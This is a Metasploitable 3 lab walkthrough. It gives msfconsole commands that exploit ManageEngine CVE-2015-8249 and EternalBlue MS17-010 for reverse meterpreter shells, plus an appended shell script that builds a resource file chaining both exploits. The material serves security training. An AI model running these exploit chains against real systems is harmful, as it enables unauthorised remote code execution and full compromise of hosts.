Metasploitable 3 Walkthrough


Metasploitable 3 Exploitation Guide

Introduction

Hello all, in this post I will be going over ways to exploit code and gain a shell on Rapid7’s Metasploitable 3 machine. Each vulnerability is split into its own section and explained, with links for reference. I will also go over ways to escalate privileges from LOCAL SERVICE shells to SYSTEM by combining multiple exploits. Each week I will add more, so consider it a rolling post that I will update with each new vulnerability I find and exploit. The link to each section will, as usual, be in the table of contents at the side of the page. If you have any questions feel free to reach out to me on Twitter or Discord, both linked at the side. Without further ado, let’s get started.

These are just some useful links and resources if you get stuck exploiting the machine.

NMAP Scan of Metasploitable 3


Metasploit Prerequisites

To make our lives easier I will launch Metasploit with the msfdb run command, which starts the PostgreSQL database (used to store hosts, services and harvested credentials) and then drops into msfconsole. I will also use the setg command to set RHOST and LHOST globally to the IP of Metasploitable 3 and our local IP respectively, so they do not need to be set again for every module. The canonical option name on current modules is RHOSTS; RHOST is accepted as an alias. You can confirm the globals took effect with getg, or with show options after loading a module.


Exploiting Manage Engine - CVE-2015-8249

The first vulnerability we will be exploiting is an outdated ManageEngine Desktop Central installation. CVE-2015-8249 is an unauthenticated file upload in the Desktop Central FileUploadServlet (the connectionId parameter is not sanitised, hence the module name), and the Metasploit module uses it to drop and execute a payload, giving unauthenticated remote code execution as LOCAL SERVICE. The module we will be using is exploit/windows/http/manageengine_connectionid_write. All we need to do is load the module and run exploit, since RHOST and LHOST are already set with setg. We also need to make sure we are using a 64-bit payload, as Metasploitable 3 is a 64-bit machine; set it with set payload windows/x64/meterpreter/reverse_tcp.

use exploit/windows/http/manageengine_connectionid_write
set payload windows/x64/meterpreter/reverse_tcp
exploit


Bingo, we got a shell as LOCAL SERVICE. Run getuid in the new meterpreter session to confirm which account the session is running as before attempting any privilege escalation.

Here is a link to an in-depth article exploiting this vulnerability - Here

Exploiting EternalBlue, MS17-010

The next vulnerability we will exploit is MS17-010, EternalBlue, a remote kernel exploit against SMBv1. Metasploitable 3 is Windows Server 2008 R2 x64, which is one of the targets the Metasploit module supports. Exploiting it is quite simple: load the module in Metasploit and run the exploit. Two practical notes: run auxiliary/scanner/smb/smb_ms17_010 first to confirm the host is actually vulnerable, and keep in mind that a failed attempt can blue-screen the target, so be ready to reset the VM.

use exploit/windows/smb/ms17_010_eternalblue
set LHOST 10.10.11.2
set RHOST 10.10.10.11
exploit

Bingo, we got a shell as SYSTEM. Because this is a kernel exploit there is no service account in the way; getuid should report NT AUTHORITY\SYSTEM.
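To tie the prerequisites and the two exploit sections together, here is an added example (not part of the original post or of the Metasploit project) that generates a Metasploit resource script covering the whole walkthrough: the setg globals, the MS17-010 scanner check, the ManageEngine module with a 64-bit payload, and the EternalBlue module. The IP addresses are the lab values used in the EternalBlue section and are assumptions for your own lab; the listener ports are chosen here so that the two background jobs do not fight over port 4444.

```shell
#!/bin/sh
# Added example: build a Metasploit resource script (.rc) for this walkthrough.
# Assumed lab addresses (from the EternalBlue section): target 10.10.10.11,
# attacker 10.10.11.2. Nothing here talks to a target; it only writes the
# commands msfconsole will replay with -r.

# valid_ipv4 ADDR -> returns 0 if ADDR is a dotted-quad IPv4 address, else 1.
valid_ipv4() {
    oldifs=$IFS
    IFS=.
    set -- $1
    IFS=$oldifs
    [ $# -eq 4 ] || return 1
    for octet in "$@"; do
        case $octet in
            ''|*[!0-9]*) return 1 ;;
        esac
        [ "$octet" -le 255 ] || return 1
    done
    return 0
}

# make_rc RHOST LHOST -> prints the resource script to stdout.
# Both addresses are validated first so a typo fails here rather than as a
# silent "handler failed to bind" inside msfconsole.
make_rc() {
    rhost=$1
    lhost=$2
    valid_ipv4 "$rhost" || { echo "bad RHOST: $rhost" >&2; return 1; }
    valid_ipv4 "$lhost" || { echo "bad LHOST: $lhost" >&2; return 1; }
    cat <<EOF
# Globals: every module below inherits these (RHOSTS is canonical, RHOST is an alias)
setg RHOSTS $rhost
setg LHOST $lhost

# Confirm SMBv1 is vulnerable before throwing a kernel exploit at it
use auxiliary/scanner/smb/smb_ms17_010
run

# ManageEngine Desktop Central, CVE-2015-8249: unauthenticated upload -> RCE
use exploit/windows/http/manageengine_connectionid_write
set payload windows/x64/meterpreter/reverse_tcp
set LPORT 4444
exploit -j -z

# MS17-010 EternalBlue: separate LPORT so the second handler can bind
use exploit/windows/smb/ms17_010_eternalblue
set payload windows/x64/meterpreter/reverse_tcp
set LPORT 4445
exploit -j -z

# List the sessions; run getuid in each to see LOCAL SERVICE vs SYSTEM
sessions -l
EOF
}

# Usage:
#   sh make_rc.sh 10.10.10.11 10.10.11.2 > m3.rc
#   msfdb start && msfconsole -q -r m3.rc
if [ $# -eq 2 ]; then
    make_rc "$1" "$2"
fi
```

The generated file is replayed with msfconsole -r; each exploit is started as a background job (-j -z) so the console stays usable while the handlers wait for callbacks, and sessions -l at the end shows which sessions came back so you can getuid each one.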
